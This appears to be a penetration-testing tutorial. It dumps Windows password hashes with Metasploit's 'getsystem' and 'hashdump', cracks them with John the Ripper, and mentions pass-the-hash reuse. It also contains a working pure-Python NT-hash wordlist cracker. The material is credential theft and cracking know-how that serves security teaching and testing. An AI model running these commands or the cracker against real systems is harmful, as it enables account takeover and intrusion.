The output of Metasploit's 'hashdump' is in pwdump format and can be fed directly to John the Ripper for cracking with the 'nt' (or 'nt2') format. Let's assume a running Meterpreter session: by escalating to SYSTEM with 'getsystem' and then issuing 'hashdump', we obtain a copy of every local account's password hashes on the system:

meterpreter > getsystem
...got system (via technique 1).
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee1033bf942cfdccbb38ab9f97319d19:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
daves:1105:aad3b435b51404eeaad3b435b51404ee:5053e7c659a614ce46d99dcfb8d9763a:::
paulp:1106:aad3b435b51404eeaad3b435b51404ee:8fdecf063cdac5d8407c5b1a75826fad:::
davem:1107:aad3b435b51404eeaad3b435b51404ee:ef00760ac292f0e8da9ca1850ee5be2f:::
office1:1108:aad3b435b51404eeaad3b435b51404ee:5052340fe27eb55317e38a7876480b18:::
office2:1109:aad3b435b51404eeaad3b435b51404ee:ad0c54ced11a55168eef0429775b1f7e:::
admin:1110:aad3b435b51404eeaad3b435b51404ee:d22d7dfc2fb717d7663b47131b1e2347:::
muser1:1111:aad3b435b51404eeaad3b435b51404ee:5053e7c659a614ce46d99dcfb8d9763a:::
muser2:1112:aad3b435b51404eeaad3b435b51404ee:b180be38c6c29a74431c966e57e4a7d8:::
muser3:1113:aad3b435b51404eeaad3b435b51404ee:e50be861156e77e57e7247b3edc1d9b6:::
muser4:1114:aad3b435b51404eeaad3b435b51404ee:a2d639861ee3a2566259796b85a08bc9:::
muser5:1116:aad3b435b51404eeaad3b435b51404ee:8fb609d78209fd8e0b91bff896a73eca:::
mike:1117:aad3b435b51404eeaad3b435b51404ee:cf9d1a4a87ab69e06d014e9c06910946:::

Two things are worth noticing before cracking. The third field of every line is aad3b435b51404eeaad3b435b51404ee, the LM hash of an empty password, which means LM hashes are not being stored on this host and only the NT hash (the fourth field) is worth attacking. Also, daves and muser1 have identical NT hashes; NT hashes are unsalted MD4, so identical hashes mean identical passwords. Save the dump to a file and run John against it –

john ./pwlist.txt --format=nt --wordlist=/pentest/passwords/wordlists/rockyou.txt
Loaded 13 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
                 (Guest)
Warning: passwords printed above might not be all those cracked
Use the "--show" option to display all of the cracked passwords reliably

Unfortunately, we could only 'crack' the Guest account, and its password is blank (31d6cfe0d16ae931b73c59d7e0c089c0 is the MD4 of an empty string). Since Guest is disabled by default on Windows, that won't be much use. Note that John reports 13 loaded hashes for 14 accounts because it de-duplicates identical hashes; cracking the shared daves/muser1 hash would yield two accounts at once. Better luck next time, or try a bigger wordlist and some rules. Even uncracked, the NT hashes themselves can still be replayed with pass-the-hash tools, so they are worth keeping.
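To make explicit what John is doing with these lines, here is an added example (not part of the original post, and not John's or Metasploit's code) that reimplements the NT hash and a minimal wordlist attack in Python. It parses pwdump lines, flags the empty LM field, de-duplicates identical NT hashes the way John does, and tries the blank password before the wordlist. MD4 is implemented in pure Python because hashlib's MD4 is disabled under many OpenSSL 3 builds. The sample input uses three lines from the dump above plus one constructed account ("testuser", whose hash is that of "password") and a three-word constructed wordlist standing in for rockyou.txt; none of the real unknown passwords above are recovered here.

```python
import struct

# Pure-Python MD4 (RFC 1320) so the example runs where hashlib.new("md4")
# raises because OpenSSL's legacy provider is not loaded.
def _rotl(x, n):
    x &= 0xFFFFFFFF
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def md4(data: bytes) -> bytes:
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)          # bit length, little-endian
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):
            a = _rotl(a + F(b, c, d) + X[i], (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl(a + G(b, c, d) + X[r2[i]] + 0x5A827999, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl(a + H(b, c, d) + X[r3[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = [(x + y) & 0xFFFFFFFF for x, y in ((a, aa), (b, bb), (c, cc), (d, dd))]
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> str:
    """NT hash = MD4 over the UTF-16LE encoding of the password, no salt."""
    return md4(password.encode("utf-16-le")).hex()

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM field when no LM hash is stored

def parse_pwdump(text: str):
    """user:rid:lmhash:nthash::: -> list of dicts (hex lower-cased)."""
    entries = []
    for line in text.strip().splitlines():
        if not line.strip():
            continue
        user, rid, lm, nt = line.split(":")[:4]
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return entries

def shared_passwords(entries):
    """Groups of users whose NT hashes collide: unsalted, so same hash == same password."""
    by_hash = {}
    for e in entries:
        by_hash.setdefault(e["nt"], []).append(e["user"])
    return [users for users in by_hash.values() if len(users) > 1]

def crack(entries, wordlist):
    """Hash each candidate once and look it up against every unique NT hash,
    which is why John reports fewer loaded hashes than accounts when two
    users share a password. Returns {user: plaintext} for the hits."""
    targets = {}
    for e in entries:
        targets.setdefault(e["nt"], []).append(e["user"])
    found = {}
    for word in [""] + list(wordlist):       # always try the blank password first
        for user in targets.get(nt_hash(word), []):
            found[user] = word
    return found

# Three lines from the hashdump above plus one constructed account whose
# NT hash is that of "password", so the constructed wordlist hits something.
SAMPLE_DUMP = """\
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
daves:1105:aad3b435b51404eeaad3b435b51404ee:5053e7c659a614ce46d99dcfb8d9763a:::
muser1:1111:aad3b435b51404eeaad3b435b51404ee:5053e7c659a614ce46d99dcfb8d9763a:::
testuser:1200:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
"""
WORDLIST = ["123456", "letmein", "password"]   # constructed stand-in for rockyou.txt

if __name__ == "__main__":
    entries = parse_pwdump(SAMPLE_DUMP)
    print("LM hashes stored:", any(e["lm"] != EMPTY_LM for e in entries))
    print("unique NT hashes:", len({e["nt"] for e in entries}), "of", len(entries), "accounts")
    print("shared passwords:", shared_passwords(entries))
    for user, pw in crack(entries, WORDLIST).items():
        print(f"{user}: {pw!r}")
```

Running it reports that no LM hashes are stored, that there are 3 unique hashes for 4 accounts, that daves and muser1 share a password, and cracks Guest (blank) and the constructed testuser ("password"); the real daves/muser1 hash stays uncracked because its plaintext is not in the toy wordlist, just as in the John run above.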